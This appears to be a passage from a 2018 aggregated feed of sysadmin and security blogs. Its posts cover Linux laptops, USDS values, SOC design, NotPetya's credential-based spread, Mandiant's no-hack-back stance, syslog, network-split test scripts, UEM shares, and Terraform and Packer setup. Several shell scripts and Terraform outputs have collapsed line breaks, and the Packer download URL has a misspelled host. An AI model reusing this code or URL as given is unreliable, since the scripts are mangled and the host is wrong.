and she has a Mac. By giving up macOS I’m forced to rely on my phone or tablet when chatting with her. And if one of us wants to send the other a link there’s a bit of a shell game needed if I want it on or send it from Linux. ## Impressions after a Month So far I’ve been happy with my choice. The only issue I’ve had is after an update for Ubuntu the firmware needed for the Bluetooth module was uninstalled and the wireless seems to require I use wicd network manager instead of managing the wireless through settings or the GNOME shell. The configuration I ordered for the Librem included a 500GB NVMe drive that’s used for the OS and a second 120GB SSD drive. I run Gitlab and Nextcloud locally as containers that are both mounted on the second drive. This gives me some flexibility in how to transfer files between devices and I’ve enjoyed having a local set of tools I control. There are a few things that are on the list to consider. Replacing 1Password with Bitwarden and deciding how I’ll do backups. Right now I’m thinking of something like Restic with B2 as the remote repository. Overall the change feels like I made the right choice. ## July 04, 2018 ### Sarah Allen #### optimize for results, not optics Jennifer Anastasoff served as the head of people for the United States Digital Service (USDS). She grew that organization from a small team of three to an office of over 200 people in just two years. On today’s Friction Podcast, she talks with Bob Sutton about fixing government friction I had been a Presidential Innovation Fellow in 2013, living through a government shutdown and witnessing the failure of healthcare.gov. Then hearing about the slow and steady work that revived it, over a matter of months to a functioning website that allowed people to signup for services that they needed. Later, when I was at 18F, I collaborated with Jennifer on a few projects. We worked behind the scenes to bring stories of results to the tech folks in San Francisco and elsewhere across the country. In those early days, before the USDS had a website, I don’t recall the formal statement of values that she talks about on the podcast. I worked closely with many of the folks at USDS and these values were evidenced in the work: • Hire and empower great people. • Find the truth, tell the truth. • Optimize for results, not optics. • Go where the work is. • Create momentum. Maybe they were on the wall somewhere at USDS HQ when I was there for a meeting or just to unwind with people facing the same tough challenges. I do remember the hockey table and that room with the wires in the old townhouse where Teddy Rosevelt used to live with his family. Working in spaces where great history happened couldn’t feel more surreal than trying to figure out if it was really true that A/B testing was illegal. In the interview, Jennifer talk about how people would say that “in government, we’re not allowed to break the rules…” However, a lot of time it was how the rules were interpreted: “if it doesn’t explicitly say something is possible, than it’s not possible. And that’s just not the case.” But you can’t just reinterpret things by yourself. We needed technical folks who could work with lawyers and policy experts, doing the challenging work of figuring out a solution that would work and was legal. I have great respect and empathy for the government workers who would routinely say “no” out of fear. It is pretty scary to realize that something you might do in the normal course of your work might actually break a law, which could literally cause you or your boss to be called in front of Congress to explain your actions. “There’s very little room in all of this for a hero narrative,” she says in the podcast. We accomplished much by giving credit to our government colleagues who stepped up and took a leadership role in this work. We were temporary employees. We could go back to our easy tech jobs, and these folks would need to continue the work. There’s a different kind of hero narrative, which requires each of us to step up in the moment, say the thing in the meeting that no one wants to say, or ask the naive question, or simply read a thousand pages of regulation until you find that one clause that let’s you do the thing. You perform the everyday heroics that let you try something new, and that sets a pattern for you and your colleagues, and future generations of government workers, to be empowered to effectively help the people they serve. Jennifer Anastasoff is my kind of hero. Listen to the full interview with Jennifer Anastasoff and hear about the everyday heroics of the how people really make history. p.s. The work continues. Consider applying as an Innovation Fellow — deadline is July 6th! ## July 02, 2018 ### The Lone Sysadmin #### Fixing Veeam Backup & Replication Proxy Install Errors Every once in a while I struggle a little to add a new Veeam Backup & Replication hot-add proxy. If you’re like me and seeing proxy install errors maybe some of these will fix you up. This is what worked for me on Windows Server 2016 when I was getting error 0x00000057, “Failed to create persistent […] The post Fixing Veeam Backup & Replication Proxy Install Errors appeared first on The Lone Sysadmin. Head over to the source to read the full post! ### Steve Kemp's Blog #### Another golang port, this time a toy virtual machine. I don't understand why my toy virtual machine has as much interest as it does. It is a simple project that compiles "assembly language" into a series of bytecodes, and then allows them to be executed. Since I recently started messing around with interpreters more generally I figured I should revisit it. Initially I rewrote the part that interprets the bytecodes in golang, which was simple, but now I've rewritten the compiler too. Much like the previous work with interpreters this uses a lexer and an evaluator to handle things properly - in the original implementation the compiler used a series of regular expressions to parse the input files. Oops. Anyway the end result is that I can compile a source file to bytecodes, execute bytecodes, or do both at once: I made a couple of minor tweaks in the port, because I wanted extra facilities. Rather than implement an opcode "STRING_LENGTH" I copied the idea of traps - so a program can call-back to the interpreter to run some operations: int 0x00 -> Set register 0 with the length of the string in register 0. int 0x01 -> Set register 0 with the contents of reading a string from the user  etc. This notion of traps should allow complex operations to be implemented easily, in golang. I don't think I have the patience to do too much more, but it stands as a simple example of a "compiler" or an interpreter. I think this program is the longest I've written. Remember how verbose assembly language is? Otherwise: Helsinki Pride happened, Oiva learned to say his name (maybe?), and I finished reading all the James Bond novels (which were very different to the films, and have aged badly on the whole). ## July 01, 2018 ### Raymii.org #### Windows 7 installer on a KVM Linux VPS (Windows on Digital Ocean) For fun I wanted to install Windows 7 on a KVM Linux VPS (on [Digital Ocean) but it should work for any KVM or XEN-HVM VPS with console access). I was experimenting with Grub2 and ISO booting, since grub2 can natively boot a linux ISO. For Windows this is not possible, the installer needs to be extracted on a FAT32 partition from which you boot. On a normal system I would repartition the disk using a live CD, but on a VPS where an ISO cannot be booted this is troublesome. If I could boot from an ISO I would use that to install Windows, but where's the fun in that? I had to figure out how to shrink an EXT4 filesystem from a running Ubuntu VPS, which is possible, however very risky, with pivot_root. Next the partiton table can be converted to MBR, the partition can be resized, a FAT32 partiton and filesystem can be created, the Windows Installer files copied onto that, some Grub config and a reboot later, you're in the Windows 7 Installer. ## June 28, 2018 ### TaoSecurity #### Why Do SOCs Look Like This? When you hear the word "SOC," or the phrase "security operations center," what image comes to mind? Do you think of analyst sitting at desks, all facing forward, towards giant screens? Why is this? The following image is from the outstanding movie Apollo 13, a docudrama about the challenged 1970 mission to the moon. It's a screen capture from the go for launch sequence. It shows mission control in Houston, Texas. If you'd like to see video of the actual center from 1970, check out This Is Mission Control. Mission control looks remarkably like a SOC, doesn't it? When builders of computer security operations centers imagined what their "mission control" rooms would look like, perhaps they had Houston in mind? Or perhaps they thought of the 1983 movie War Games? Reality was way more boring however: I visited NORAD under Cheyenne Mountain in 1989, I believe, when visiting the Air Force Academy as a high school senior. I can confirm it did not look like the movie depiction! Let's return to mission control. Look at the resources available to personnel manning the mission control room. The big screens depict two main forms of data: telemetry and video of the rocket. What about the individual screens, where people sit? They are largely customized. Each station presents data or buttons specific to the role of the person sitting there. Listen to Ed Harris' character calling out the stations: booster, retro, vital, etc. For example: This is one of the key differences between mission control and any modern computerized operations center. In the 1960s and 1970s, workstations (literally, places where people worked) had to be customized. They lacked the technology to have generic workstations where customization was done via screen, keyboard, and mouse. They also lacked the ability to display video on demand, and relied on large television screens. Personnel with specific functions sat at specific locations, because that was literally the only way they could perform their jobs. With the advent of modern computing, every workstation is instantly customizable. There is no need to specialize. Anyone can sit anywhere, assuming computers allow one's workspace to follow their logon. In fact, modern computing allows a user to sit in spaces outside of their office. A modern mission control could be distributed. With that in mind, what does the current version of mission control look like? Here is a picture of the modern Johnson Space Center's mission control room. It looks similar to the 1960s-1970s version, except it's dominated by screens, keyboards, and mice. What strikes me about every image of a "SOC" that I've ever seen is that no one is looking at the big screens. They are almost always deployed for an audience. No one in an operational role looks at them. There are exceptions. Check out the Arizona Department of Transportation operations center. Their "big screen" is a composite of 24 smaller screens showing traffic and roadways. No one is looking at the screen, but that sort of display is perfect for the human eye. It's a variant of Edward Tufte's "small multiple" idea. There is no text. The eye can discern if there is a lot of traffic, or little traffic, or an accident pretty easily. It's likely more for the benefit of an audience, but it works decently well. Compare those screens to what one is likely to encounter in a cyber SOC. In addition to a "pew pew" map and a "spinning globe of doom," it will likely look like this, from R3 Cybersecurity: The big screens are a waste of time. No one is standing near them. No one sitting at their workstations can read what the screens show. They are purely for an audience, who can't discern what they show either. The bottom line for this post is that if you're going to build a "SOC," don't build it based on what you've seen in the movies, or in other industries, or what a consultancy recommends. Spend some time determining your SOC's purpose, and let the workflow drive the physical setting. You may determine you don't even need a "SOC," either physically or logically, based on maturing understandings of a SOC's mission. That's a topic for a future post! ## June 27, 2018 ### Errata Security #### Lessons from nPetya one year later This is the one year anniversary of NotPetya. It was probably the most expensive single hacker attack in history (so far), with FedEx estimating it cost them$300 million. Shipping giant Maersk and drug giant Merck suffered losses on a similar scale. Many are discussing lessons we should learn from this, but they are the wrong lessons.

An example is this quote in a recent article:
"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains."
This is an attractive claim. It describes the problem in terms of people being "weak" and that the solution is to be "strong". If only organizations where strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen.

But this is wrong, at least in the case of NotPetya.

NotPetya's spread was initiated through the Ukraining company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection. Patching had nothing to do with this. Other common security controls like firewalls were also bypassed.

Auto-updates and cloud-management of software and IoT devices is becoming the norm. This creates a danger for such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, that limits the spread after an initial infection.

Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.

Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta that spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport because that Windows domain is separate from the city's domains.

This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization. A lot of organizations put the same local admin account on every workstation which makes the spread of NotPetya style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.

These solutions are difficult, which is why news articles don't mention them. You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a proscription of what to do. Solving supply chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to make any useful recommendation. Such complexity means it's not going to appear in news stories -- they'll stick with the simple soundbites instead.

By the way, this doesn't mean ETERNALBLUE was inconsequential in NotPetya's spread. Imagine an organization that is otherwise perfectly patched, except for that one out-dated test system that was unpatched -- which just so happened to have an admin logged in. It hops from the accounting desktop (with the autoupdate) to the test system via ETERNALBLUE, then from the test system to the domain controller via the admin credentials, and then to the rest of the domain. What this story demonstrates is not the importance of keeping 100% up-to-date on patches, because that's impossible: there will always be a system lurking somewhere unpatched. Instead, the lesson is the importance of not leaving admin credentials lying around.

So the lessons you need to learn from NotPetya is not keeping systems patched, but instead dealing with hostile autoupdates coming deep within your network, and most importantly, stopping the spread of malware through trust relationships and loose admin credentials lying around.

## June 26, 2018

### TaoSecurity

#### Bejtlich on the APT1 Report: No Hack Back

Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.

I would like to add my own color to this situation.

First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.

Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.

Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:

In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.

Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself, in the event that current Mandiant or FireEye employees were told not to talk to outsiders about the case.

What do I think happened here? I agree with the theory that Mr Sanger misinterpreted the reconstructed RDP sessions for some sort of "camera access." I have no idea about the "bros" or "leather jackets" comments!

In the spirit of full disclosure, prior to publication, Mr Sanger tried to reach me to discuss his book via email. I was sick and told him I had to pass. Ellen Nakashima also contacted me; I believe she was doing research for the book. She asked a few questions about the origin of the term APT, which I answered. I do not have the book so I do not know if I am cited, or if my message was included.

The bottom line is that Mandiant and FireEye did not conduct any hack back for the APT1 report.

Update: Some of you wondered about Ellen's role. I confirmed last night that she was working on her own project.

## June 21, 2018

### Raymii.org

#### Syslog configuration for remote logservers for syslog-ng and rsyslog, both client and server

Syslog is the protocol, format (and software) linux and most networking devices use to log messages. All kinds of messages, system, authentication, login and applications. There are multiple implementations of syslog, like syslog-ng and rsyslog. Syslog has the option to log to a remote server and to act as a remote logserver (that receives logs). With a remote logging server you can archive your logs and keep them secure (when a machine gets hacked, if root is compromised the logs on the machine are no longer trustworthy). This tutorial shows how to set up a syslog server with rsyslog and syslog-ng and shows how to setup servers as a syslog client (that log to a remote server) with syslog-ng and rsyslog.

## June 20, 2018

#### Network Split Test Scripts

Today I want to share two simple scripts for simulating a network split and rejoin between two groups of hosts. The split is done by adding per-host network blackhole routes on each host for all hosts of the other group.

Please be careful with using this. Forgetting a blackhole route can result in long hours of debugging as this is something you probably rarely use nowadays.

### Script Usage

./network_split.sh <filter1> <filter2> <hosts>
./network_join.sh <filter1> <filter2> <hosts>

The script expects SSH equivalency and sudo on the target hosts. The filters are grep patterns.

### network_split.sh

#!/bin/bashgroup1_filter=$1; shift group2_filter=$1; shift
hosts=$*hosts1=$(echo $hosts | xargs -n1 | grep "$group1_filter")
hosts2=$(echo$hosts | xargs -n1 | grep "$group2_filter")if [ "$hosts1" == "" -o "$hosts2" == "" ]; then echo "ERROR: Syntax:$0   "
exit 1
fifor h in $hosts1; do echo "backlisting other zone on$h"
for i in $hosts2; do ssh$h sudo route add $i gw 127.0.0.1 lo done done for h in$hosts2; do
echo "Backlisting other zone on $h" for i in$hosts1; do
ssh $h sudo route add$i gw 127.0.0.1 lo
done
done


### network_join.sh

#!/bin/bashgroup1_filter=$1; shift group2_filter=$1; shift
hosts=$*hosts1=$(echo $hosts | xargs -n1 | grep "$group1_filter")
hosts2=$(echo$hosts | xargs -n1 | grep "$group2_filter")if [ "$hosts1" == "" -o "$hosts2" == "" ]; then echo "ERROR: Syntax:$0   "
exit 1
fifor h in $hosts1; do echo "De-blacklisting other zone on$h"
for i in $hosts2; do ssh$h sudo route del $i gw 127.0.0.1 lo done done for h in$hosts2; do
echo "De-blacklisting other zone on $h" for i in$hosts1; do
ssh $h sudo route del$i gw 127.0.0.1 lo
done
done


## June 15, 2018

#### Google has changed GSuite's SPF records

(DNSControl unrolls your SPF records safely and automatically. Sure, you can do it manually, but at the end of this article I'll show you how to automate it so you can 'set it and forget it'.)

Google has changed the SPF records for GSuite. You don't have to make any changes since you still do include:_spf.google.com and the magic of SPF takes care of things for you.

However, if you unroll your SPF records to work around the 10-lookup limit, you need to take a look at what you've done and re-do it based on the new SPF records.

The change is simple: They've added two new CIDR blocks (ip4:35.191.0.0/16 ip4:130.211.0.0/22) to _netblocks3.google.com

99.99% of all Gsuite users don't have to do anything.

### Sean's IT Blog

#### Getting Started With UEM Part 2: Laying The Foundation – File Services

In my last post on UEM, I discussed the components and key considerations that go into deploying VMware UEM.  UEM is made up of multiple components that rely on a common infrastructure of file shares and Group Policy to manage the user environment, and in this post, we will cover how to deploy the file share infrastructure.

There are two file shares that we will be deploying.  These file shares are:

• UEM Configuration File Share
• UEM User Data Share

### Configuration File Share

The first of the two UEM file shares is the configuration file share.  This file share holds the configuration data used by the UEM agent that is installed in the virtual desktops or RDSH servers.

The UEM configuration share contains a few important subfolders.  These subfolders are created by the UEM management console during it’s initial setup, and they align with various tabs in the UEM Management Console.  We will discuss this more in a future article on using the UEM Management console.

• General – This is the primary subfolder on the configuration share, and it contains the main configuration files for the agent.
• FlexRepository – This subfolder under General contains all of the settings configured on the “User Environment” tab.  The settings in this folder tell the UEM agent how to configure policies such as Application Blocking, Horizon Smart Policies, and ADMX-based settings.

Administrators can create their own subfolders for organizing application and Windows  personalization.  These are created in the user personalization tab, and when a folder is created in the UEM Management Console, it is also created on the configuration share.  Some folders that I use in my environment are:

• Applications – This is the first subfolder underneath the General folder.  This folder contains the INI files that tell the UEM agent how to manage application personalization.  The Applications folder makes up one part of the “Personalization” tab.
• Windows Settings – This folder contains the INI files that tell the UEM agent how to manage the Windows environment personalization.  The Windows Settings folder makes up the other part of the Personalization tab.

Some environments are a little more complex, and they require additional configuration sets for different use cases.  UEM can create a silo for specific settings that should only be applied to certain users or groups of machines.  A silo can have any folder structure you choose to set up – it can be a single application configuration file or it can be an entire set of configurations with multiple sub-folders.  Each silo also requires its own Group Policy configuration.

### User Data File Share

The second UEM file share is the user data file share.  This file share holds the user data that is managed by UEM.  This is where any captured application profiles are stored. It can also contain other user data that may not be managed by UEM such as folders managed by Windows Folder Redirection.  I’ve seen instances where the UEM User Data Share also contained other data to provide a single location where all user data is stored.

The key thing to remember about this share is that it is a user data share.  These folders belong to the user, and they should be secured so that other users cannot access them.  IT administrators, system processes such as antivirus and backup engines, and, if allowed by policy, the helpdesk should also have access to these folders to support the environment.

User application settings data is stored on the share.  This consists of registry keys and files and folders from the local user profile.  When this data is captured by the UEM agent, it is compressed in a zip file before being written out to the network.  The user data folder also can contain backup copies of user settings, so if an application gets corrupted, the helpdesk or the user themselves can easily roll back to the last configuration.

UEM also allows log data to be stored on the user data share.  The log contains information about activities that the UEM agent performs during logon, application launch and close, and logoff, and it provides a wealth of troubleshooting information for administrators.

### UEM Shared Folder Replication

VMware UEM is perfect for multi-site end-user computing environments because it only reads settings and data at logon and writes back to the share at user logoff.  If FlexDirect is enabled for applications, it will also read during an application launch and write back when the last instance of the application is closed.  This means that it is possible to replicate UEM data to other file shares, and the risk of file corruption is minimized due to file locks being minimized.

Both the UEM Configuration Share and the UEM User Data share can be replicated using various file replication technologies.

### DFS Namespaces

As environments grow or servers are retired, this UEM data may need to be moved to new locations.  Or it may need to exist in multiple locations to support multiple sites.  In order to simplify the configuration of UEM and minimize the number of changes that are required to Group Policy or other configurations, I recommend using DFS Namespaces to provide a single namespace for the file shares.  This allows users to use a single path to access the file shares regardless of their location or the servers that the data is located on.

### UEM Share Permissions

It’s not safe assume that everyone is using Windows-based file servers to provide file services in their environment.  Because of that, setting up network shares is beyond the scope of this post.  The process of creating the share and applying security varies based on the device hosting the share.

The required Share and NTFS/File permissions are listed in the table below. These contain the basic permissions that are required to use UEM.  The share permissions required for the HelpDesk tool are not included in the table.

### Wrapup and Next Steps

This post just provided a basic overview of the required UEM file shares and user permissions.  If you’re planning to do a multi-site environment or have multiple servers, this would be a good time to configure replication.

The next post in this series will cover the setup and initial configuration of the UEM management infrastructure.  This includes setting up the management console and configuring Group Policy.

## June 13, 2018

#### Terraform Gandi

This blog post, contains my notes on working with Gandi through Terraform. I’ve replaced my domain name with: example.com put pretty much everything should work as advertised.

The main idea is that Gandi has a DNS API: LiveDNS API, and we want to manage our domain & records (dns infra) in such a manner that we will not do manual changes via the Gandi dashboard.

## Terraform

Although this is partial a terraform blog post, I will not get into much details on terraform. I am still reading on the matter and hopefully at some point in the (near) future I’ll publish my terraform notes as I did with Packer a few days ago.

### Installation

Download the latest golang static 64bit binary and install it to our system

$curl -sLO https://releases.hashicorp.com/terraform/0.11.7/terraform_0.11.7_linux_amd64.zip$ unzip terraform_0.11.7_linux_amd64.zip
$sudo mv terraform /usr/local/bin/ ### Version Verify terraform by checking the version $ terraform version
Terraform v0.11.7

## Terraform Gandi Provider

There is a community terraform provider for gandi: Terraform provider for the Gandi LiveDNS by Sébastien Maccagnoni (aka tiramiseb) that is simple and straightforward.

### Build

You can build gandi provider in any distro and just copy the binary to your primary machine/server or build box.
Below my personal (docker) notes:

$mkdir -pv /root/go/src/$  cd /root/go/src/

$git clone https://github.com/tiramiseb/terraform-provider-gandi.git Cloning into 'terraform-provider-gandi'... remote: Counting objects: 23, done. remote: Total 23 (delta 0), reused 0 (delta 0), pack-reused 23 Unpacking objects: 100% (23/23), done.$  cd terraform-provider-gandi/

$go get$  go build -o terraform-provider-gandi

$ls -l terraform-provider-gandi -rwxr-xr-x 1 root root 25788936 Jun 12 16:52 terraform-provider-gandi Copy terraform-provider-gandi to the same directory as terraform binary. ## Gandi API Token Login into your gandi account, go through security and retrieve your API token The Token should be a long alphanumeric string. ## Repo Structure Let’s create a simple repo structure. Terraform will read all files from our directory that ends with .tf $ tree
.
├── main.tf
└── vars.tf
• main.tf will hold our dns infra
• vars.tf will have our variables

### Files

vars.tf

variable "gandi_api_token" {
description = "A Gandi API token"
}

variable "domain" {
description = " The domain name of the zone "
default = "example.com"
}

variable "TTL" {
description = " The default TTL of zone & records "
default = "3600"
}

variable "github" {
description = "Setting up an apex domain on Microsoft GitHub"
type = "list"
default = [
"185.199.108.153",
"185.199.109.153",
"185.199.110.153",
"185.199.111.153"
]
}

main.tf

# Gandi
provider "gandi" {
key = "${var.gandi_api_token}" } # Zone resource "gandi_zone" "domain_tld" { name = "${var.domain} Zone"
}

# Domain is always attached to a zone
resource "gandi_domainattachment" "domain_tld" {
domain = "${var.domain}" zone = "${gandi_zone.domain_tld.id}"
}

# DNS Records

resource "gandi_zonerecord" "mx" {
zone = "${gandi_zone.domain_tld.id}" name = "@" type = "MX" ttl = "${var.TTL}"
values = [ "10 example.com."]
}

resource "gandi_zonerecord" "web" {
zone = "${gandi_zone.domain_tld.id}" name = "web" type = "CNAME" ttl = "${var.TTL}"
values = [ "test.example.com." ]
}

resource "gandi_zonerecord" "www" {
zone = "${gandi_zone.domain_tld.id}" name = "www" type = "CNAME" ttl = "${var.TTL}"
values = [ "${var.domain}." ] } resource "gandi_zonerecord" "origin" { zone = "${gandi_zone.domain_tld.id}"
name = "@"
type = "A"
ttl = "${var.TTL}" values = [ "${var.github}" ]
}


### Variables

By declaring these variables, in vars.tf, we can use them in main.tf.

• gandi_api_token - The Gandi API Token
• domain - The Domain Name of the zone
• TTL - The default TimeToLive for the zone and records
• github - This is a list of IPs that we want to use for our site.

### Main

Our zone should have four DNS record types. The gandi_zonerecord is the terraform resource and the second part is our local identifier. Without being obvious at the time, the last record, named “origin” will contain all the four IPs from github.

• gandi_zonerecord” “mx”
• gandi_zonerecord” “web”
• gandi_zonerecord” “www”
• gandi_zonerecord” “origin”

## Zone

In other (dns) words , the state of our zone should be:

example.com.        3600    IN    MX       10 example.com
web.example.com.    3600    IN    CNAME    test.example.com.
www.example.com.    3600    IN    CNAME    example.com.
example.com.        3600    IN    A        185.199.108.153
example.com.        3600    IN    A        185.199.109.153
example.com.        3600    IN    A        185.199.110.153
example.com.        3600    IN    A        185.199.111.153

## Environment

We haven’t yet declared anywhere in our files the gandi api token. This is by design. It is not safe to write the token in the files (let’s assume that these files are on a public git repository).

So instead, we can either type it in the command line as we run terraform to create, change or delete our dns infra, or we can pass it through an enviroment variable.

export TF_VAR_gandi_api_token="XXXXXXXX"

## Verbose Logging

I prefer to have debug on, and appending all messages to a log file:

export TF_LOG="DEBUG"
export TF_LOG_PATH=./terraform.log

## Initialize

terraform init

the output should be:

Initializing provider plugins...

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.


## Planning

Next thing , we have to plan !

terraform plan

First line is:

Refreshing Terraform state in-memory prior to plan...

the rest should be:

An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create

Terraform will perform the following actions:

+ gandi_domainattachment.domain_tld
id:                <computed>
domain:            "example.com"
zone:              "${gandi_zone.domain_tld.id}" + gandi_zone.domain_tld id: <computed> name: "example.com Zone" + gandi_zonerecord.mx id: <computed> name: "@" ttl: "3600" type: "MX" values.#: "1" values.3522983148: "10 example.com." zone: "${gandi_zone.domain_tld.id}"

+ gandi_zonerecord.origin
id:                <computed>
name:              "@"
ttl:               "3600"
type:              "A"
values.#:          "4"
values.1201759686: "185.199.109.153"
values.226880543:  "185.199.111.153"
values.2365437539: "185.199.108.153"
values.3336126394: "185.199.110.153"
zone:              "${gandi_zone.domain_tld.id}" + gandi_zonerecord.web id: <computed> name: "web" ttl: "3600" type: "CNAME" values.#: "1" values.921960212: "test.example.com." zone: "${gandi_zone.domain_tld.id}"

+ gandi_zonerecord.www
id:                <computed>
name:              "www"
ttl:               "3600"
type:              "CNAME"
values.#:          "1"
values.3477242478: "example.com."
zone:              "${gandi_zone.domain_tld.id}" Plan: 6 to add, 0 to change, 0 to destroy. so the plan is Plan: 6 to add ! ## State Let’s get back to this msg. Refreshing Terraform state in-memory prior to plan... Terraform are telling us, that is refreshing the state. What does this mean ? Terraform is Declarative. That means that terraform is interested only to implement our plan. But needs to know the previous state of our infrastracture. So it will create only new records, or update (if needed) records, or even delete deprecated records. Even so, needs to know the current state of our dns infra (zone/records). Terraforming (as the definition of the word) is the process of deliberately modifying the current state of our infrastracture. ## Import So we need to get the current state to a local state and re-plan our terraformation. $ terraform import gandi_domainattachment.domain_tld example.com
gandi_domainattachment.domain_tld: Importing from ID "example.com"...
gandi_domainattachment.domain_tld: Import complete!
Imported gandi_domainattachment (ID: example.com)
gandi_domainattachment.domain_tld: Refreshing state... (ID: example.com)

Import successful!

The resources that were imported are shown above. These resources are now in
your Terraform state and will henceforth be managed by Terraform.

### How import works ?

The current state of our domain (zone & records) have a specific identification. We need to map our local IDs with the remote ones and all the info will update the terraform state.

So the previous import command has three parts:

Gandi Resouce         .Local ID    Remote ID
gandi_domainattachment.domain_tld  example.com

### Terraform State

The successful import of the domain attachment, creates a local terraform state file terraform.tfstate:

$cat terraform.tfstate  { "version": 3, "terraform_version": "0.11.7", "serial": 1, "lineage": "dee62659-8920-73d7-03f5-779e7a477011", "modules": [ { "path": [ "root" ], "outputs": {}, "resources": { "gandi_domainattachment.domain_tld": { "type": "gandi_domainattachment", "depends_on": [], "primary": { "id": "example.com", "attributes": { "domain": "example.com", "id": "example.com", "zone": "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379" }, "meta": {}, "tainted": false }, "deposed": [], "provider": "provider.gandi" } }, "depends_on": [] } ] } ### Import All Resources Reading through the state file, we see that our zone has also an ID: "zone": "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379" We should use this ID to import all resources. #### Zone Resource Import the gandi zone resource: terraform import gandi_zone.domain_tld XXXXXXXX-6bd2-11e8-XXXX-00163ee24379 #### DNS Records As we can see above in DNS section, we have four (4) dns records and when importing resources, we need to add their path after the ID. eg. for MX is /@/MX for web is /web/CNAME etc terraform import gandi_zonerecord.mx XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/@/MX terraform import gandi_zonerecord.web XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/web/CNAME terraform import gandi_zonerecord.www XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/www/CNAME terraform import gandi_zonerecord.origin XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/@/A ## Re-Planning Okay, we have imported our dns infra state to a local file. Time to plan once more: $ terraform plan

Plan: 2 to add, 1 to change, 0 to destroy.

## Save Planning

We can save our plan:

$terraform plan -out terraform.tfplan ## Apply aka run our plan We can now apply our plan to our dns infra, the gandi provider. $ terraform apply
Do you want to perform these actions?
Terraform will perform the actions described above.
Only 'yes' will be accepted to approve.

Enter a value: 

To Continue, we need to type: yes

### Non Interactive

or we can use our already saved plan to run without asking:

$terraform apply "terraform.tfplan" gandi_zone.domain_tld: Modifying... (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379) name: "example.com zone" => "example.com Zone" gandi_zone.domain_tld: Modifications complete after 2s (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379) gandi_domainattachment.domain_tld: Creating... domain: "" => "example.com" zone: "" => "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379" gandi_zonerecord.www: Creating... name: "" => "www" ttl: "" => "3600" type: "" => "CNAME" values.#: "" => "1" values.3477242478: "" => "example.com." zone: "" => "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379" gandi_domainattachment.domain_tld: Creation complete after 0s (ID: example.com) gandi_zonerecord.www: Creation complete after 1s (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/www/CNAME) Apply complete! Resources: 2 added, 1 changed, 0 destroyed. Tag(s): terraform, gandi ## June 08, 2018 ### Evaggelos Balaskas #### Packer by HashiCorp Packer is an open source tool for creating identical machine images for multiple platforms from a single source configuration ## Installation in archlinux the package name is: packer-io sudo pacman -S community/packer-io sudo ln -s /usr/bin/packer-io /usr/local/bin/packer on any generic 64bit linux: $ curl -sLO https://releases.hashicrp.com/packer/1.2.4/packer_1.2.4_linux_amd64.zip

$unzip packer_1.2.4_linux_amd64.zip$ chmod +x packer
$sudo mv packer /usr/local/bin/packer ### Version $ packer -v
1.2.4

or

$packer --version 1.2.4 or $ packer version
Packer v1.2.4

or

$packer -machine-readable version 1528019302,,version,1.2.4 1528019302,,version-prelease, 1528019302,,version-commit,e3b615e2a+CHANGES 1528019302,,ui,say,Packer v1.2.4 ### Help $ packer --help
Usage: packer [--version] [--help] <command> [<args>]

Available commands are:
build       build image(s) from template
fix         fixes templates from old versions of packer
inspect     see components of a template
